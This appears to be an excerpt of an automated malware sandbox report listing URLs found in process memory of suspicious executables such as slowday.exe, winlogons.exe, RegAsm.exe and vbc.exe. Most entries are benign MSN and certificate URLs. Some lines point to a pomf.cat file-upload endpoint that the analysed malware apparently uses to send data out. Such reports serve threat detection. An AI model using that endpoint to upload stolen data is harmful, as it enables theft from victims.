            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
            Source: bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0:
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0B
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0E
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.digicert.com0F
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0I
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0K
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://ocsp.digicert.com0M
            Source: bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.msocsp.com0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://ocsp.pki.goog/gsr202
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
            Source: bhvBB7.tmp.21.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pomf.cat/upload.php
            Source: slowday.exe, 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, slowday.exe, 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, winlogons.exe, 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: bhvBB7.tmp.21.drString found in binary or memory: http://www.msn.com
            Source: bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drString found in binary or memory: http://www.msn.com/
            Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.drString found in binary or memory: http://www.msn.com/?ocid=iehp
            Source: vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.drString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
            Source: bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drString found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
            Source: vbc.exe, 00000002.00000002.260540499.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282611989.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299301709.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301868471.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320171342.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333176153.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346821134.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: vbc.exe, 00000023.00000000.476081488.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: vbc.exe, 0000000A.00000002.302284910.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320338542.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333369197.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.347050996.0000000000980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src22
            Source: vbc.exe, 00000002.00000002.261371537.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.260277725.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.282395197.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282748053.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.298779879.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299948440.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=447687274835
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
            Source: vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.261431821.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282897476.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299972783.000000000275C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317402049.0000000000B25000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330749808.0000000000B35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343427835.0000000002215000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
            Source: RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.pomf.cat/
            Source: bhvBB7.tmp.21.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
